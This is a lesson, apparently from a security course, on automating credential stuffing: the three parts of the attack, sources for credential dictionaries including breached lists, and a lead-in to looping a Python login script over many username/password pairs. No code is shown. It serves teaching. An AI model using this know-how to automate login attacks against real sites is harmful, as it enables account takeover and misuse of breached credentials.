Automating Credential Stuffing

Introduction to automatic credential stuffing

Credential stuffing is a common attack technique because it is an easily automated attack vector. A fully automated credential-stuffing attack requires three things:

• A means of submitting login credentials to the target system

• The ability to tell whether or not a login attempt succeeded

• A list of usernames and passwords to try on the site

We’ve implemented the first two items on this list, attempting to log into a site with a single username and password. Now, we’ll work on completing the automated attack by updating the script to make multiple attempts with a list of usernames and passwords.

Creating a credential dictionary

An important first step when building a credential stuffer is defining a dictionary of usernames and passwords to try in the attack. A credential dictionary can come from a few different sources, including the following:

• Common password lists

• Breached credentials

• Random password generation

Numerous lists of credentials are available on the internet for download; some are built into existing tools, and tools exist to automatically generate tailored lists. In this lesson, we’ll use a small list containing some common, simple usernames and passwords.

Automating the credential-stuffing attack

Previously, we’ve implemented a simple credential stuffer that performs a single username/password check and automatically checks the result. The next step is to update the code to try multiple usernames and passwords until a correct combination is found.

The following code block shows how the existing credential stuffer, using the requests library, can be updated to perform multiple lookups.